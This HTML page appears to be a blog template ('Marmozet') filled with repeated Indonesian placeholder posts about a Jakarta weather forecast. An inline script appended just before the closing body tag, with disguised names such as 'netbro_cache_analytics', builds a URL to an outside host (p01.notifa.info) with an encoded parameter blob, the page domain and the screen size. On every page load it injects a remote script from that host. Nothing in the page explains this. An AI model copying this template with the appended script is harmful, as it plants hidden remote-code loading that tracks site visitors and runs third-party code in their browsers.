<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Marmozet - Blog</title>
    <link rel="stylesheet" href="assets/vendor/font-awesome-5/css/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/css/custom.css">
    <link rel="stylesheet" href="assets/css/main.css">
    <link rel="stylesheet" href="assets/css/responsive.css">
</head>

<body>
    <!-- Preloader  -->
    <div id="preloader">
        <div class="loader-logo text-center">
            <img src="assets/img/logo.png" alt="">
            <p>Please Wait</p>
        </div>
    </div>
    <div class="loader">
        <div class="block_first"></div>
        <div class="block_second"></div>
    </div>

    <!-- Navbar -->
    <nav>
        <div class="">
            <div class="nav-burger c-magnetic">
                <div class="span">
                    <div class="toggle-btn link empty-cursor">
                        <div class="burger-menu">
                            <span class="one"></span>
                            <span class="two"></span>
                            <span class="tre"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="bg_block_first"></div>
        <div class="bg_block_second"></div>

        <div class="manu-container">
            <div class="menu">
                <div class="data">
                    <ul>
                        <li><span class="menu-link multi-start">Works</span>
                            <ul class="multimenu">
                                <li><a class="link load-marmoset" href="index.html">Fullscreen</a></li>
                                <li><a class="link load-marmoset" href="home-single.html">Single</a></li>
                                <li><a class="link load-marmoset" href="home-multi-vert.html">Multi</a></li>
                            </ul>
                        </li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="about.html">About</a></li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="blog-sidebar.html">Blog</a></li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="contact.html">Contact</a></li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="index.html">Buy Now</a></li>
                    </ul>

                </div>

            </div>
        </div>
    </nav>
    <!-- Logo -->
    <div class="logo">
        <a class="link" href="index.html"><img src="assets/img/logo.png" alt="logo"></a>
    </div>



    <!-- Custom Cursor -->
    <div class="cursor"></div>
    <div class="cursor-follower"></div>



    <!-- social media -->
    <div class="social">
        <ul>
            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-facebook" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-instagram" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-twitter" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-behance" aria-hidden="true"></i>
                    </a>
                </span>
            </li>
        </ul>
    </div>

    <div class="copyright">
        <p>&copy; cingunt 2019</p>
    </div>
    <section>
        <div class="container">
            <div class="row">
                <div class="col-12 text-center">
                    <div class="main-title mt-90">
                        <h1 class="strokes">Blog <span>Post</span></h1>

                        <div class="dash"></div>
                    </div>

                </div>
            </div>
        </div>
    </section>
    <!-- BLOG-->
    <div class="container">
        <div class="row">
            <div class="col-lg-8">
                <div class="blog-item mt-50">
                    <figure>
                        <img class="img-fluid" src="assets/img/portfolio/0.jpg" alt="">
                    </figure>
                    <div class="blog-text  mt-30">
                        <div class="categories-blog">
                            <a href="#">Photography</a>
                            <a href="#">Design</a>
                            <a href="#">Development</a>
                        </div>

                        <h2>Cuaca Hari Ini: Hujan Petir Selimuti Jakarta Selatan dan Timur Sore Hari</h2>
                        <p>Badan Meteorologi, Klimatologi, dan Geofisika (BMKG) mengungkap cuaca Jakarta dan sekitarnya
                            pagi ini, Sabtu (16/2/2019), cenderung berawan.

                            Siang hari, potensi curah hujan sedang dan hujan lokal diperkirakan bakal terjadi di
                            sebagian wilayah Jabodetabek. Yaitu di Jakarta Selatan, Jakarta Timur, Bekasi, Depok, dan
                            Bogor.</p>
                        <div class="blog-author">
                            <p>Maudy Ayunda, 20 February 2019</p>
                        </div>
                        <div class="text-left mt-30">
                            <a class="btn-sends" href="#">Read More</a>
                        </div>

                    </div>
                </div>
                <div class="blog-item mt-50">
                    <figure>
                        <img class="img-fluid" src="assets/img/portfolio/1.jpg" alt="">
                    </figure>
                    <div class="blog-text  mt-30">
                        <div class="categories-blog">
                            <a href="#">Photography</a>
                            <a href="#">Design</a>
                            <a href="#">Development</a>
                        </div>

                        <h2>Cuaca Hari Ini: Hujan Petir Selimuti Jakarta Selatan dan Timur Sore Hari</h2>
                        <p>Badan Meteorologi, Klimatologi, dan Geofisika (BMKG) mengungkap cuaca Jakarta dan sekitarnya
                            pagi ini, Sabtu (16/2/2019), cenderung berawan.

                            Siang hari, potensi curah hujan sedang dan hujan lokal diperkirakan bakal terjadi di
                            sebagian wilayah Jabodetabek. Yaitu di Jakarta Selatan, Jakarta Timur, Bekasi, Depok, dan
                            Bogor.</p>
                        <div class="blog-author">
                            <p>Maudy Ayunda, 20 February 2019</p>
                        </div>
                        <div class="text-left mt-30">
                            <a class="btn-sends" href="#">Read More</a>
                        </div>

                    </div>
                </div>
            </div>
            <div class="col-lg-4 mt-50 sidebar">

                <div class="categories">
                    <h3 class="widget-title">Recent Post</h3>
                    <ul>
                        <li><a href="#">Hujan Petir Selimuti Jakarta Selatan dan Timur Sore Hari</a></li>
                        <li><a href="#">Hujan Petir Selimuti Jakarta Selatan dan Timur Sore Hari</a></li>
                        <li><a href="#">Hujan Petir Selimuti Jakarta Selatan dan Timur Sore Hari</a></li>
                    </ul>
                </div>

                <div class="categories mt-50">
                    <h3 class="widget-title">Archives</h3>
                    <ul>
                        <li><a href="#">January 2019</a></li>
                        <li><a href="#">February 2019</a></li>
                    </ul>
                </div>

                <div class="categories mt-50">
                        <h3 class="widget-title">Categories</h3>
                        <ul>
                            <li><a href="#">General</a></li>
                            <li><a href="#">Development</a></li>
                            <li><a href="#">Design</a></li>
                        </ul>
                    </div>

            </div>
        </div>
    </div>
    <!-- END BLOG-->
    <div class="next-page centered mt-50">
        <div class="container text-center" data-aos="fade-up">
            <div class="title">
                <p>View our work</p>
                <h3 class="strokes"><a class="link load-marmoset" href="home-multi-vert.html"><span>Projects</span></a></h3>
            </div>
        </div>
    </div>

    <script src="assets/js/plugin.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49"
        crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy"
        crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/1000hz-bootstrap-validator/0.11.9/validator.min.js" integrity="sha256-dHf/YjH1A4tewEsKUSmNnV05DDbfGN3g7NMq86xgGh8="
        crossorigin="anonymous"></script>
    <script src="assets/js/contact.js"></script>
    <script src="assets/js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAUiWnkSN8PMQuitNX1bKfzcLrAy1HG2bhj5p29y%2fVyyCyxpA26iLjQkTcy3tF6VrgPAN0xQH9BreX%2fYKkeDx5gGRKVCUdulhE2HSgALi4gxHkNhcQCP3CRXjaNhxf7JCiG3MaaaYskIt3UZqHEQWALACMRd%2bY1t7OJ2MI25sJhAXr%2fy3JBSlbiJimdJ3xiBd%2f0xQxOxkWr5v%2b0cMbR7AVBQrEIhKXMZSavWowMwu8uc8HRjM7dx3Nb1wG5e1IfYJg4zL%2f386GEHgQlpYUjdSN7T%2ff2u%2fbeeryL9aGe47giTknDBxX8xXaWpW3wDM%2fFmtJlclM6c1Z%2f5%2fPgYbKKRotZmpMqFZCibxvgD7DgLxF8V5lPYsqsy5NLYmQEE6QanqTyKCwzWXsEleAP9nMtbfU1XnXvk4r6Cgy6Fb00JaFYCPm5pFz76cbq6amDVyBe0IZaB1xx3U2PH2fgUX82WWzBpCl036WwSq20mesbX3jct0%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>